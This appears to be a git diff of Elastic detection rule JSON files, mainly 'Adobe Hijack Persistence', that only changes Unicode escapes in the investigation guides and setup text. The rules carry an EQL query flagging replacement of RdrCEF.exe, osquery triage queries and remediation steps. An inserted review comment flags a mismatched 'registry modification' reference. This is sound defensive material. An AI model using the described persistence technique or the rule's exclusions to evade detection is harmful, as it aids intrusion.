@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - 
Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
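Review bot: The investigation guide in the new `note` string tells the analyst to search for 4624 logons "after the registry modification", but this rule is a `file where ... event.type == "creation"` match on `RdrCEF.exe` and involves no registry key; the sentence appears to have been carried over from a registry-persistence guide and will send responders looking for the wrong pivot event. Suggested wording: `Analysts can do this by searching for login events (for example, 4624) to the target host after the file creation.` The `setup` text in the following hunk on this line reads "populate `event.ingested` to @timestamp" where the intent, per the rest of the sentence, is to populate `event.ingested` from `@timestamp`; `populate `event.ingested` from `@timestamp`` would be clearer. The enclosing rule object starts and ends outside these hunks.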
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json index 92763536950..e20d4551ee3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - 
Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json
index cf17e460f18..332746ab150 100644
--- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - 
Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" 
@@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json index 3599082ed68..1b3cb8b388f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json index 777c6e29d34..679099fd041 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json index c4a62e22aa3..bf25b07fc02 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json +++ 